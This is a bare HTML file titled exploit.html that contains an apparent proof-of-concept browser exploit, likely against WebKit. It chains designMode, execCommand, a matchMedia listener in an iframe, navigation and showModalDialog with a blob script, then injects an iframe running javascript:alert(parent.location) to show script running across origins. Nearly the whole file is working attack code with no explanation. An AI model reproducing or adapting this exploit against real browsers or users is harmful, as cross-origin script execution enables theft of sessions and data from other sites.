exploit.html

<html>

<body>
  <button>Click Anywhere.</button>
  <script>
    function sleep(ms) {
      let start = new Date();
      while (new Date() - start < ms) {

      }
    }

    window.onclick = () => {
      window.onclick = null;

      document.designMode = 'on';
      document.execCommand('selectAll');

      let f = document.body.appendChild(document.createElement('iframe'));
      let media_list = f.contentWindow.matchMedia("(max-width: 100px)");

      function listener() {
        let a = document.createElement('a');
        a.href = 'https://bugs.webkit.org/#quicksearch_top';
        a.click();

        sleep(1000);

        window.showModalDialog(URL.createObjectURL(new Blob([
          `
<script>
let it = setInterval(() => {
try {
    opener.document.x;
} catch (e) {
    clearInterval(it);

    setTimeout(() => {
        window.close();
    }, 2000);
}
}, 100);
</scrip` + 't>'
        ], {
            type: 'text/html'
          })));
      }

      media_list.addListener(listener);
      document.execCommand('insertHTML', false, 'aaa<a-a></a-a><iframe src="javascript:alert(parent.location)"></iframe>');
    };
  </script>
</body>

</html>